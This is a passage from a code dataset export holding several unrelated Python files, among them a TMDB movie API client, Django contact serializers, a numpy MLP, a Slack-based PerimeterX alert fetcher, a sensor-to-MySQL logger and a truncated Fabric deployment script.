família ou amigos e veja:\",\n 10752: \"em clima de guerra:\",\n 10759: \"um pouco de ação e aventura:\",\n 10763: \"que tal experimentar algo jornalístico?\",\n 10762: \"caso queira algo mais infantil:\",\n 10764: \"por que não um reality show?\",\n 10765: \"ficção científica e fantasia:\",\n 10766: \"conhece o gênero soap opera?\",\n 10767: \"por que não um talk show?\",\n 10768: \"um pouco de guerra e política:\",\n 10770: \"mergulhe no cinema:\",\n }\n main_providers = {\n \"netflix\": 8,\n \"prime\": 119,\n \"disney+\": 337,\n \"itunes\": 2,\n \"google\": 3,\n \"looke\": 47,\n \"fox\": 229,\n \"mubi\": 11,\n \"star+\": 619,\n \"paramount+\": 531,\n \"hbo\": 384,\n \"claro\": 167,\n \"telecine\": 227,\n \"globo\": 307,\n }\n\n @classmethod\n @cached(ttl=3600)\n async def request(cls, path, **kwargs):\n url = f\"{cls.base_url}/{path}\"\n headers = {\n \"Content-Type\": \"application/json\",\n \"Accept\": \"application/json\",\n \"Connection\": \"close\",\n }\n default_params = {\"api_key\": cls.key, \"language\": \"pt-BR\"}\n params = kwargs.get(\"params\")\n if params:\n params.update(default_params)\n else:\n params = default_params\n return await aiorequests.get(url, params=params, headers=headers)\n\n @classmethod\n async def details(cls, id):\n return await cls.request(f\"movie/{id}\")\n\n @classmethod\n async def credits(cls, id):\n return await cls.request(f\"movie/{id}/credits\")\n\n @classmethod\n async def ids(cls, id):\n return await cls.request(f\"movie/{id}/external_ids\")\n\n @classmethod\n async def lists(cls, id):\n return await cls.request(f\"movie/{id}/lists\")\n\n @classmethod\n async def recommendation(cls, id):\n return await cls.request(f\"movie/{id}/recommendations\")\n\n @classmethod\n async def similar(cls, id):\n return await cls.request(f\"movie/{id}/similar_movies\")\n\n @classmethod\n async def watch(cls, id):\n return await cls.request(f\"movie/{id}/watch/providers\")\n\n @classmethod\n async def upcoming(cls):\n return await cls.request(\"movie/upcoming\", params={\"region\": \"BR\"})\n\n @classmethod\n async def now(cls):\n return await cls.request(\"movie/now_playing\", params={\"region\": \"BR\"})\n\n @classmethod\n async def latest(cls):\n return await cls.request(\"movie/latest\")\n\n @classmethod\n async def popular(cls):\n return await cls.request(\"movie/popular\")\n\n @classmethod\n async def top(cls):\n return 
await cls.request(\"movie/top_rated\")\n\n @classmethod\n async def discover(cls, provider):\n return await cls.request(\"discover/movie\", params={\"with_watch_providers\": provider, \"watch_region\": \"BR\"})\n\n @classmethod\n async def trend(cls):\n return await cls.request(\"trending/movie/day\")\n\n @classmethod\n async def search(cls, query):\n return await cls.request(\"search/movie\", params={\"query\": query})\n\n @classmethod\n async def from_imdb(cls, imdb_id):\n return await cls.request(f\"find/{imdb_id}\", params={\"external_source\": \"imdb_id\"})\n\n @classmethod\n async def find(cls, query):\n imdb_id = re.search(r\"(?:imdb.com\\/title\\/)?(tt[0-9]{9})\", query)\n if imdb_id:\n return await cls.from_imdb(imdb_id[1])\n response = await cls.search(query)\n return response[\"results\"][0] if response[\"results\"] else {}\n","sub_path":"somali/apis/movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"300420767","text":"import csv\nimport re\nimport sys\nimport pandas as pd \nimport numpy as np\nimport collections\n\n\"\"\"\nfamily id\n\"\"\"\n\nif __name__ == '__main__':\n\n\tdata = pd.read_csv('data/test_5.csv')\n\tdata1 = pd.read_csv('data/train_5.csv')\n\n\tfor index,row in data.iterrows():\n\t\tif type(row['Cabin']) is str:\n\t\t\tdata.ix[index,'Cabin'] = str(row['Cabin'][0])\n\t\telse :\n\t\t\tdata.ix[index,'Cabin'] = str('N/A')\n\tfor index1,row1 in data1.iterrows():\n\t\tif type(row1['Cabin']) is str:\n\t\t\tdata1.ix[index1,'Cabin'] = str(row1['Cabin'][0])\n\t\telse :\n\t\t\tdata1.ix[index1,'Cabin'] = str('N/A')\n\n\tdata.to_csv('data/test_6.csv',mode = 'w',index = False)\n\tdata1.to_csv('data/train_6.csv',mode = 'w',index = False)","sub_path":"rel_sur.py","file_name":"rel_sur.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"571257906","text":"'''\nSerializers for Contact.\n'''\nimport re\nimport json\nimport copy\nimport datetime\n\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.db import transaction\nfrom django.db.models import F\n\nfrom rest_framework import serializers\n\nfrom .models import (Contact, Address, Number, Email, )\nfrom entity.models import Entity\nfrom core.mixins.queryfields import SerializerFieldsMixin\n\n\nclass ShipToDataField(serializers.JSONField):\n\n def validate(self, value):\n return re.findall(r\"(2[0-3]|[01][0-9]):([0-5][0-9])\", value) if value else []\n\n def to_internal_value(self, data):\n errors = {}\n if not data:\n errors = {'start_time': _(\"This field is required\"), 'end_time': _(\n \"This field is required\")}\n else:\n if data['start_time'] and not self.validate(data['start_time']):\n errors['start_time'] = _(\"Invalid Syntax\")\n elif not data['start_time']:\n errors['start_time'] = _(\"This field is required\")\n\n if data['end_time'] and not self.validate(data['end_time']):\n errors['end_time'] = _(\"Invalid Syntax\")\n elif not data['end_time']:\n errors['end_time'] = _(\"This field is required\")\n\n if errors:\n raise serializers.ValidationError(errors)\n return data\n\n\nclass AddressSerializer(SerializerFieldsMixin, serializers.ModelSerializer):\n address_type = None\n id = serializers.IntegerField(required=False)\n\n def __init__(self, *args, **kwargs):\n if kwargs.get('address_type'):\n self.address_type = 
kwargs.pop('address_type')\n super().__init__(*args, **kwargs)\n # if self.address_type == \"shipto\": #removed for new signup journey\n # self.fields['data'] = ShipToDataField()\n\n class Meta:\n model = Address\n default_fields = ('id', 'address', 'city')\n fields = ('id', 'address', 'city', 'postal_code',\n 'state', 'country', 'data', 'address_type')\n\n\nclass NumberSerializer(SerializerFieldsMixin, serializers.ModelSerializer):\n id = serializers.IntegerField(required=False)\n\n class Meta:\n model = Number\n default_fields = ('id')\n fields = ('id', 'number', 'number_type', )\n\n def validate(self, validated_data):\n if not validated_data:\n raise serializers.ValidationError(\n {'number': _(\"This field may not be blank.\")})\n if validated_data.get('number_type') == 'main' and validated_data.get('number') == '':\n raise serializers.ValidationError(\n {'number': _(\"This field may not be blank.\")})\n return validated_data\n\n\nclass EmailSerializer(SerializerFieldsMixin, serializers.ModelSerializer):\n id = serializers.IntegerField(required=False)\n\n def validate(self, validated_data):\n if not validated_data or validated_data.get('email') == '':\n raise serializers.ValidationError(\n {'email': _(\"This field is required.\")})\n return validated_data\n\n class Meta:\n model = Email\n default_fields = ('id')\n fields = ('id', 'email', )\n\n\nclass ContactSerializer(SerializerFieldsMixin, serializers.ModelSerializer):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n if kwargs.get('data', {}) and kwargs.get('data', {}).get('contact_type') == Contact.CONTACT_TYPE_BUYER_SHIP_TO:\n self.fields['addresses'] = AddressSerializer(\n many=True, address_type=\"shipto\")\n if kwargs.get('data', {}) and kwargs.get('data', {}).get('contact_type') in [\n Contact.CONTACT_TYPE_BUYER_MAIN_CONTACT_PERSON, Contact.CONTACT_TYPE_BUYER_LOCATION, Contact.CONTACT_TYPE_BUYER_SHIP_TO\n ]:\n self.fields['name'] = serializers.CharField(\n max_length=128, allow_null=False)\n self.fields['name'].error_messages['blank'] = 'This field may not be blank.'\n\n addresses = AddressSerializer(many=True, required=False)\n numbers = NumberSerializer(many=True, required=False)\n emails = EmailSerializer(many=True, required=False)\n\n def validate_related_records(self, records, model, field):\n if self.instance:\n pks = [record.get('id') for record in records if record.get('id')]\n existing_pks = list(model.objects.select_related('contact').filter(\n pk__in=pks, contact=self.instance).values_list('id', flat=True))\n if set(pks) != set(existing_pks):\n raise serializers.ValidationError([{\n \"detail\": _(\"Not found.\")\n } if (record.get('id') and record.get('id') not in existing_pks) else {} for record in records])\n return records\n\n def validate_emails(self, records):\n return self.validate_related_records(records, Email, \"emails\")\n\n def validate_addresses(self, records):\n return self.validate_related_records(records, Address, \"addresses\")\n\n def validate_numbers(self, records):\n return self.validate_related_records(records, Number, \"numbers\")\n\n def save_warehouse_contact(self, instance, contact, ship_to_data):\n\n if instance:\n numbers, emails, addresses = [ids.pop('id') if ids.get('id') else None for ids in ship_to_data['numbers']], [ids.pop(\n 'id') if ids.get('id') else None for ids in ship_to_data['emails']], [ids.pop('id') if ids.get('id') else None for ids in ship_to_data['addresses']]\n\n ship_to_data['contact_type'] = 'buyer:ship_to'\n ship_to_data.pop('data')\n if 
ship_to_data.get('addresses', None) and not ship_to_data.get('addresses')[0].get('data'):\n ship_to_data['addresses'][0]['data'] = {\n 'start_time': '00:00', 'end_time': '00:00'}\n ship_to_data['addresses'][0]['address_type'] = 'ship_to'\n ship_to = self.create(ship_to_data)\n Contact.objects.filter(pk=contact.id).update(\n data={'is_ship_to': True, 'ship_to_id': ship_to.id})\n\n return ship_to\n\n def validate(self, validated_data):\n contact_msg = {\n Contact.CONTACT_TYPE_BUYER_LOCATION: 'retail',\n Contact.CONTACT_TYPE_BUYER_SHIP_TO: 'warehouse/ship to'\n }\n\n contact_type = self.instance.contact_type if self.instance else validated_data.get(\n 'contact_type')\n if validated_data.get('addresses', None):\n for address in validated_data.get('addresses'):\n existing_address = Address.objects.filter(signature='{}-{}-{}-{}'.format(\n self.context['of_type'].id, self.context['of_id'], contact_type, address.get('postal_code')))\n\n if existing_address.exists():\n if 'id' not in address or address.get('id') != existing_address.first().id:\n raise serializers.ValidationError(\n {'addresses': [\n {'address': 'The address you entered is already associated with a ' +\n contact_msg[contact_type]+' location. Please enter a different address.'}\n ]}\n )\n\n return validated_data\n\n @transaction.atomic\n def create(self, validated_data):\n ship_to_data = copy.deepcopy(validated_data)\n\n def save_related(contact, records, model):\n if not records:\n return\n if model == Address:\n model.objects.bulk_create([\n model(contact=contact, signature='{}-{}-{}-{}'.format(self.context['of_type'].id, self.context['of_id'], contact.contact_type, record.get('postal_code')), **record) for record in records\n ])\n\n else:\n model.objects.bulk_create([\n model(contact=contact, **record) for record in records\n ])\n\n emails = validated_data.pop(\n 'emails') if 'emails' in validated_data else None\n addresses = validated_data.pop(\n 'addresses') if 'addresses' in validated_data else None\n # if validated_data.get('contact_type') == 'buyer:location' and addresses:\n # addresses[0].pop('data')\n numbers = validated_data.pop(\n 'numbers') if 'numbers' in validated_data else None\n\n contact = super().create(validated_data)\n save_related(contact, emails, Email)\n save_related(contact, addresses, Address)\n save_related(contact, numbers, Number)\n\n if validated_data.get('contact_type') == 'buyer:location' and validated_data.get('data', None) and validated_data.get('data', None).get('is_ship_to') and not validated_data.get('data').get('ship_to_id', None):\n contact = self.save_warehouse_contact(\n '', contact, ship_to_data)\n return contact\n\n @transaction.atomic\n def update(self, instance, validated_data):\n ship_to_data = copy.deepcopy(validated_data)\n\n def save_related(contact, records, model):\n if records is None:\n return\n pks = [record.get('id') for record in records if 'id' in record]\n model.objects.select_related('contact').filter(\n contact=contact).exclude(id__in=pks).delete()\n to_create = []\n\n for record in records:\n if 'id' not in record:\n if model == Address:\n to_create.append(model(contact=contact, signature='{}-{}-{}-{}'.format(\n self.context['of_type'].id, self.context['of_id'], contact.contact_type, record.get('postal_code')), **record))\n else:\n to_create.append(model(contact=contact, **record))\n else:\n if model == Address:\n model.objects.filter(\n pk=record.get('id')).update(signature='{}-{}-{}-{}'.format(self.context['of_type'].id, self.context['of_id'], contact.contact_type, 
record.get('postal_code')), **record)\n else:\n model.objects.filter(\n pk=record.get('id')).update(**record)\n if to_create:\n model.objects.bulk_create(to_create)\n\n emails = validated_data.pop(\n 'emails') if 'emails' in validated_data else None\n addresses = validated_data.pop(\n 'addresses') if 'addresses' in validated_data else None\n # if validated_data.get('contact_type') == 'buyer:location' and addresses is not None:\n # addresses[0].pop('data')\n numbers = validated_data.pop(\n 'numbers') if 'numbers' in validated_data else None\n contact = super().update(instance, validated_data)\n\n if emails is not None:\n save_related(contact, emails, Email)\n\n if addresses is not None:\n save_related(contact, addresses, Address)\n\n if numbers is not None:\n save_related(contact, numbers, Number)\n\n if validated_data.get('contact_type') == 'buyer:location' and validated_data.get('data') and validated_data.get('data').get('is_ship_to') == False and validated_data.get('data').get('ship_to_id', None):\n\n Contact.objects.filter(id=validated_data.get(\n 'data').get('ship_to_id')).delete()\n\n contact.data = {}\n contact.save()\n\n if validated_data.get('contact_type') == 'buyer:location' and validated_data.get('data') and validated_data.get('data').get('is_ship_to') and not validated_data.get('data').get('ship_to_id', None):\n contact = self.save_warehouse_contact(\n instance, contact, ship_to_data)\n return contact\n\n class Meta:\n model = Contact\n fields = ('id', 'name', 'contact_type', 'data',\n 'addresses', 'numbers', 'emails')\n default_fields = ('id', 'name', 'contact_type')\n expandable_fields = {\n 'addresses': (AddressSerializer, (), {'many': True, 'required': False}),\n 'numbers': (NumberSerializer, (), {'many': True, 'required': False}),\n 'emails': (EmailSerializer, (), {'many': True, 'required': False}),\n }\n","sub_path":"src/contact/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":12374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"634973399","text":"import numpy as np\nimport loglinear as ll\nimport config\n\nSTUDENT={'name': 'SHAHAR SIEGMAN',\n 'ID': '011862141'}\n\ndef layer_output(x,params):\n # calculates the output of a layer of the form\n # a = tanh(z) = tanh(xW+b)\n W, b = params\n a = np.tanh(np.dot(x,W)+b)\n return a\n\ndef classifier_output(x, params):\n # calculation is done in 2 stages\n # we need to feed-forward from x to x1\n # then solve x1 with loglinear.predict\n W, b, U, b_prime = params\n x1 = layer_output(x, (W,b))\n probs = ll.classifier_output(x1,(U,b_prime))\n return probs\n\ndef predict(x, params):\n \"\"\"\n params: a list of the form [W, b, U, b_tag]\n \"\"\"\n return np.argmax(classifier_output(x, params))\n\ndef loss_and_gradients(x, y, params):\n \"\"\"\n params: a list of the form [W, b, U, b_tag]\n\n returns:\n loss,[gW, gb, gU, gb_tag]\n\n loss: scalar\n gW: matrix, gradients of W\n gb: vector, gradients of b\n gU: matrix, gradients of U\n gb_tag: vector, gradients of b_tag\n \"\"\"\n\n W, b, U, b_tag = params\n out_dim = U.shape[1]\n # first, do the entire feedforward\n \n shape_b = b.shape\n if len(shape_b)==1:\n if config.debug:\n print(\"b should be a 2d array, actual shape: {}\".format(shape_b))\n b = np.array(b,np.double, ndmin=2)\n\n a2 = layer_output(x,[W,b]) \n z3 = np.dot(a2,U) + b_tag\n y_hat = ll.softmax(z3)\n\n y_e = ll.to_one_hot_row(y,out_dim)\n\n y_diff = y_hat - y_e\n \n #print(\"feedforward complete.\")\n # now we can use backprop\n gU 
= np.dot(a2.transpose(), y_diff )\n gb_tag = y_diff.copy()\n\n delta2 = np.dot(y_diff, U.T) \n delta2 = delta2 * (1-a2 ** 2)\n\n gW = np.dot(x.transpose(), delta2)\n gb = delta2\n\n loss = ll.logloss(y_e, y_hat)\n return loss,[gW, gb, gU, gb_tag]\n\n \n\ndef create_classifier(in_dim, hid_dim, out_dim):\n \"\"\"\n returns the parameters for a multi-layer perceptron,\n with input dimension in_dim, hidden dimension hid_dim,\n and output dimension out_dim.\n\n return:\n a flat list of 4 elements, W, b, U, b_tag.\n \"\"\"\n W = np.zeros((in_dim,hid_dim), np.double)\n b = np.zeros((1,hid_dim), np.double)\n U = np.zeros((hid_dim,out_dim), np.double)\n b_tag = np.zeros((1,out_dim), np.double)\n return [W,b,U, b_tag]\n\n","sub_path":"NLP-courses/89687-DL/Assignment1/code/mlp1.py","file_name":"mlp1.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"11150009","text":"'''\nA helper script to scrape and format the individual results from nested folders.\n\nWritten by RL for the RACC_NR project.\n\n12/8/2018\n'''\n\nimport os\nimport pandas as pd\nimport argparse\nimport warnings\n\ncn = ['training_prob','testing_prob','file_type','joint_matrix','mariginal_prediction','marginal_labels','mutual_information']\nresult_df = pd.DataFrame(columns=cn)\n\n# suppress all warnings\nwarnings.filterwarnings(\"ignore\")\n\n# function to save the dataframe\ndef output_file(df, filen, output_path):\n outputname = filen+\".csv\"\n if len(df) > 0:\n df.to_csv(output_path+outputname,sep=',', na_rep=\" \", encoding='utf-8', index_label=False, index=False) \n print(\"Length of the dataframe:\"+str(len(df)))\n print(\"Results have been saved under \"+output_path+\" as \"+filen)\n\nparser = argparse.ArgumentParser(\n description='RACC_NR U-Net data aggregation script')\nparser.add_argument('--p', required=True,\n metavar=\"/path/to/dataset/\",\n help='Path to the saved folder (root, containing all the result files)')\nargs = parser.parse_args()\ndir_path = args.p\n\n# force the path to end with /\nif dir_path[-1] != '/':\n dir_path += '/'\n\n# full walking on the folder\nfor root, dirs, files in os.walk(dir_path):\n for file_ in files:\n full_path = os.path.join(root, file_)\n full_path_elem = full_path.split('/')\n if 'test_summary.txt' in full_path_elem[-1]:\n # found the summary file\n with open(full_path, 'r') as f:\n data = f.read()\n data_split = data.split('\\n')\n train_prob_convert = full_path_elem[-4].split('_')[1].replace('p','.')\n test_prob_convert = full_path_elem[-3].split('_')[1].replace('p','.')\n df = pd.DataFrame([[train_prob_convert,test_prob_convert,full_path_elem[-2],data_split[1]+'\\n'+data_split[2],data_split[4],data_split[6],data_split[-1]]],columns=cn)\n result_df = pd.concat([result_df, df], ignore_index=True)\n \n# once finish, output the dataframe \noutput_file(result_df, 'RACC_NR_result',dir_path)","sub_path":"Aggregate_results.py","file_name":"Aggregate_results.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"217538700","text":"import requests\n\nCD_MSG_TITLE = 'Code Defender has detected a new incident'\n\nclass PerimeterXManagerException(Exception):\n \"\"\" General Exception for PerimeterX manager \"\"\"\n pass\n\nclass PerimeterXManager(object):\n\n def __init__(self, slack_channel=None, slack_api_key=None, connector_type=None, offset_in_ms=0):\n self.slack_channel = slack_channel\n 
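# offset_in_ms is converted below into the seconds.microseconds float that Slack's 'oldest' parameter expects\n        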
self.slack_api_key = slack_api_key\n self.slack_offset = self.convert_offset(offset_in_ms)\n self.connector_type = connector_type\n self.slack_cursor = ''\n self.paginated = False\n self.messages = []\n\n\n \"\"\" Siemplify cannot store microseconds like Slack requires\n so we take the offset_in_ms turn it into microseconds with *10000\n Next, we need to add a single microsecond to avoid a loop with the +1\n Finally, we /1000000 to generate the time format required for the slack API \n If the offset is 0, then we just use 0\"\"\"\n def convert_offset(self, ms):\n if(ms == 0):\n return ms\n return float(((ms*10000)+1)/1000000)\n\n\n def get_slack_channel_id(self):\n response = requests.get(\n 'https://slack.com/api/conversations.list',\n headers={'Authorization': 'Bearer ' + self.slack_api_key}\n )\n # curl -H 'Authorization: Bearer slack_api_key' https://slack.com/api/conversations.list\n # foreach channels if name == slack_channel, then return id\n if response.status_code != 200:\n return False\n\n json_response = response.json()\n\n # check to make sure we've got a channels array\n if 'channels' not in json_response:\n return False\n\n # check to make sure the channels is a list\n if type(json_response['channels']) != list:\n return False\n\n # step through the channels looking for the one we want\n for x in json_response['channels']:\n # if this is the channel we want then return the id\n if x['name'] == self.slack_channel:\n return x['id']\n\n return False\n\n\n def f(self, x):\n return {\n 'slack': self.get_slack_messages()\n }.get(x, False)\n\n\n def getItemFromList(self, list, searchItem, searchValue, returnValue):\n for x in list:\n if x[searchItem] == searchValue:\n return x[returnValue]\n return False\n\n\n def before(self, value, a):\n # Find first part and return slice before it.\n pos_a = value.find(a)\n if pos_a == -1: return value\n return value[0:pos_a]\n\n\n def formatSlackMsg(self, msg):\n return {\n 'type': 'slack',\n 'ts': msg['ts'],\n 'text': self.before(msg['attachments'][0]['text'], '\\n'),\n 'fullText': msg['attachments'][0]['text'],\n 'title': msg['attachments'][0]['title'],\n 'severity': self.getItemFromList(msg['attachments'][0]['fields'], 'title', 'Risk Level', 'value'),\n 'script': self.getItemFromList(msg['attachments'][0]['fields'], 'title', 'Script', 'value'),\n 'domain': self.getItemFromList(msg['attachments'][0]['fields'], 'title', 'Host Domain', 'value'),\n 'deepLink': self.getItemFromList(msg['attachments'][0]['actions'], 'text', 'View in Console', 'url')\n }\n\n\n def get_slack_messages(self):\n channelId = self.get_slack_channel_id()\n\n if channelId == False:\n return False\n\n response = requests.get(\n 'https://api.slack.com/api/conversations.history',\n verify=False,\n params={'channel': channelId, 'limit': 100, 'cursor': self.slack_cursor, 'oldest': self.slack_offset},\n headers={'Authorization': 'Bearer ' + self.slack_api_key}\n )\n\n if response.status_code != 200:\n return False\n\n json_response = response.json()\n\n if json_response['has_more'] == True:\n self.pagination = 1\n self.slack_cursor = json_response['response_metadata']['next_cursor']\n else:\n self.pagination = 0\n self.slack_cursor = ''\n\n if 'messages' not in json_response:\n return False\n\n # Check to make sure we got some messages returned\n if json_response['messages'] == False:\n return False\n\n # Check to make sure there's messages in the list\n if len(json_response['messages']) < 1:\n return False\n\n # walk through our retrieved messages to find CD related entries\n 
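# (conversations.history returns newest-first; self.messages accumulates across recursive pagination calls)\n        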
for x in json_response['messages']:\n            # Check for a Code Defender specific message\n            if x['type'] == 'message' and 'attachments' in x and x['attachments'][0]['title'] == CD_MSG_TITLE:\n                self.messages.append(self.formatSlackMsg(x))\n\n        if self.pagination == 1:\n            self.get_slack_messages()\n\n        return self.messages\n\n\n    def get_cd_alerts(self, integrationType):\n        # Execute the desired message retrieval\n        return self.f(integrationType)\n\n\n    def get_connector_type(self):\n        return self.connector_type\n    \n    \n    def auth(self):\n        response = requests.post(\n            'https://slack.com/api/auth.test',\n            headers={'Authorization': 'Bearer ' + self.slack_api_key}\n        )\n        if response.status_code != 200:\n            return False\n\n        json_response = response.json()\n        if 'ok' in json_response and json_response['ok'] == True:\n            return True\n\n        if 'ok' in json_response and json_response['ok'] == False:\n            return False\n\n        return False\n","sub_path":"PerimeterXManager.py","file_name":"PerimeterXManager.py","file_ext":"py","file_size_in_byte":5629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"214306009","text":"import pymysql\nimport Adafruit_DHT\n\nDHT_PIN = 26\nDHT_TYPE = Adafruit_DHT.DHT11\n\ndb = pymysql.connect(host='localhost',\n                     port=3306,\n                     user='root',\n                     password='1234',\n                     db='raspiDBK',\n                     charset='utf8')\n\nhum, temp = Adafruit_DHT.read_retry(DHT_TYPE, DHT_PIN)\nif hum is not None and temp is not None:\n    print('Temp = {0:0.1f}*C Humidity ={1:0.1f}%'.format(temp,hum))\n    with db.cursor() as cur:\n        sql = \"\"\"insert into sensor(time, hum, temp, illum)\n                values (now(), %s, %s, 0)\"\"\"\n        print(sql)\n        cur.execute(sql, (hum,temp))\n        db.commit()\n\n    with db.cursor() as cur:\n        sql=\"select * from sensor\"\n        cur.execute(sql)\n        rows = cur.fetchall()\n        for row_data in rows:\n            print(row_data)\n\nelse:\n    print(\"nope\")\n","sub_path":"dht_db.py","file_name":"dht_db.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"209416077","text":"import sys\nsys.path.append('../../') \nimport algorithms.TD.Q_learning_SARSAMAX as TDiter \nimport gym\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom statistics import mean\nimport pandas as pd\nimport seaborn as sns\n\nENV_NAME = 'FrozenLake-v0'\n\ndef play_game_with_policies(env_name, list_of_Qs, output_file_path):\n    \"\"\"This function takes an environment, and a list of policies\n    which it wants to compare performance between on this environment.\"\"\"\n    iteration_num = 0\n    env = gym.make(env_name)\n    policy_average_rewards = []\n    policy_names=[]\n    for Q_func in list_of_Qs:\n        policy_name = 'iteration_'+str(iteration_num)\n        policy_names.append(policy_name)\n        rewards_by_episode = []\n        for episode in range(500):\n            state = env.reset()\n            done = False\n            episode_reward = 0\n            while not done:\n                next_action = np.argmax(Q_func[state])\n                state, reward, done, info = env.step(next_action) \n                episode_reward += reward\n            rewards_by_episode.append(episode_reward)\n        iteration_num+=1\n        policy_average_rewards.append(mean(rewards_by_episode))\n    plt.title('Average Reward by Policy')\n    bars = plt.bar(policy_names, policy_average_rewards)\n    for bar in bars:\n        yval = bar.get_height()\n        plt.text(bar.get_x(), yval + .005, yval)\n    plt.savefig(fname=output_file_path)\n\nif __name__ == '__main__':\n\n    # Create your environment\n    env = gym.make(ENV_NAME)\n    env.reset()\n\n    # Create policy iterator object\n    policy_iterator = TDiter.TD_off_policy(env=env,\n                                           
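# Q-learning (SARSAMAX) is off-policy TD control; lambda_value presumably sets the eligibility-trace decay\n                                           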
discount_factor=1,\n                                           learning_rate=0.1,\n                                           lambda_value=0.1)\n\n\n    # Call iterate function and get all the policies iterated through\n    list_of_Qs = policy_iterator.iterate(iteration_loops=100001,\n                                         print_every_n=10000,\n                                         eval_episodes=1,\n                                         epsilon_soft=0.1)\n    print('''Check these Qs to make sure they are sufficiently different!\n{}'''.format(list_of_Qs))\n\n    # Play game with generated policies and save results!\n    play_game_with_policies(env_name=ENV_NAME,\n                            list_of_Qs=list_of_Qs,\n                            output_file_path='outputs/policy_iter_Q_learning_TD_off.png')\n\n","sub_path":"implementations/examples/frozen_lake/TD_off_policy_Q_learning.py","file_name":"TD_off_policy_Q_learning.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"44031234","text":"import sys\nimport string\n\ndef op(a, b):\n    \"\"\"This function computes the five basic operations (+, -, x, :, %) on its 2 int input args\"\"\"\n    tab = [0, 0, 0, 0, 0]\n    tab[0] = a + b\n    tab[1] = a - b\n    tab[2] = a * b\n    if b == 0:\n        tab[3] = \"ERROR (div by zero)\"\n    else:\n        tab[3] = a / b\n    if b == 0:\n        tab[4] = \"ERROR (modulo by zero)\"\n    else:\n        tab[4] = a % b\n    print(\"Sum: {}\\nDiff: {}\\nProduct: {}\\nQuotient: {}\\nRemainder: {}\".format(tab[0], tab[1], tab[2], tab[3], tab[4]))\n\nif __name__ == '__main__':\n    if len(sys.argv) != 3:\n        print(\"usage: python operations.py [operands]\\nexample:\\n\\tpython operations.py 10 3\")\n    elif not sys.argv[1].isnumeric() or not sys.argv[2].isnumeric():\n        print(\"InputError: only number\")\n    else:\n        op(int(sys.argv[1]), int(sys.argv[2]))\n    \n","sub_path":"day00/ex04/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"191902118","text":"# Marcelo Campos de Medeiros\n# ADS UNIFIP\n# Repetition Structure\n# 25/03/2020\n\n'''\n33 - The State Department of Meteorology hired you to develop\na program that reads an indeterminate set of temperatures\nand reports at the end the lowest and the highest temperatures given,\nas well as the average of the temperatures.\n'''\n\nprint('=' * 40)\nprint('{:=^40}'.format(\" 'PROGRAMA QUE LEIA TEMPERATURAS' \"))\nprint('=' * 40, '\\n')\n\nnum = int(input('Quantas temperaturas vai informar: '))\n\nmaior = 0\nmenor = 0\nsoma = 0\nfor c in range(1, num +1):\n    temp = float(input(f'Qual a {c}° temperatura: '))\n    soma += temp\n    if c == 1:\n        maior = temp\n        menor = temp\n    if temp > maior:\n        maior = temp\n    if temp < menor:\n        menor = temp\nprint(f'A maior temperatura é {maior}\\n'\n      f'A menor temperatura é {menor}\\n'\n      f'A média da temperatura é {soma / num}')\n","sub_path":"exerc_33.py","file_name":"exerc_33.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"179848690","text":"#!/bin/python\n# ~/fabfile.py\n# A Fabric file for carrying out various administrative tasks.\n# Tim Sutton, Jan 2013\n\n# To use this script make sure you have fabric and fabtools.\n# pip install fabric fabtools\n\nimport os\nimport getpass\n\nfrom fabric.api import task, env, fastprint, cd, run, sudo, local, prompt\nfrom fabric.contrib.project import rsync_project\nfrom fabric.contrib.files import exists, sed\nfrom fabric.colors import red, blue, green\nfrom fabtools import require\nfrom fabtools.deb import update_index\n# Don't remove even though it's unused\n# noinspection 
PyUnresolvedReferences\nfrom fabtools.vagrant import vagrant\n\n# noinspection PyUnresolvedReferences\nfrom fabgis.dropbox import setup_dropbox, setup_dropbox_daemon\nfrom fabgis.django import setup_apache, build_pil, set_media_permissions\nfrom fabgis.git import update_git_checkout\nfrom fabgis.virtualenv import setup_venv\nfrom fabgis.common import setup_env, show_environment\nfrom fabgis.postgres import (\n create_user,\n get_postgres_dump,\n restore_postgres_dump,\n setup_postgis_2,\n create_postgis_2_template)\n\n\ndef get_vars():\n \"\"\"Helper method to get standard deployment vars.\n\n :returns: A tuple containing the following:\n * base_path: Workspace dir e.g. ``/home/foo/python``\n * code_path: Project dir e.g. ``/home/foo/python/visual_changelog``\n * git_url: Url for git checkout - use http for read only checkout\n * repo_alias: Name of checkout folder e.g. ``visual_changelog``\n * site_name: Name for the web site e.g. ``visual_changelog``\n\n :rtype: tuple\n \"\"\"\n setup_env()\n site_name = 'visual_changelog'\n base_path = os.path.abspath(os.path.join(\n env.fg.home, 'dev', 'python'))\n git_url = 'http://github.com/timlinux/visual_changelog.git'\n repo_alias = 'visual_changelog'\n code_path = os.path.abspath(os.path.join(base_path, repo_alias))\n return base_path, code_path, git_url, repo_alias, site_name\n\n@task\ndef update_venv(code_path):\n \"\"\"Update the virtual environment to ensure it has node etc. installed.\n\n :param code_path: Directory in which project is located.\n :type code_path: str\n\n e.g.::\n\n fab -H localhost update_venv:/home/timlinux/dev/python/visual_changelog\n \"\"\"\n setup_venv(code_path, 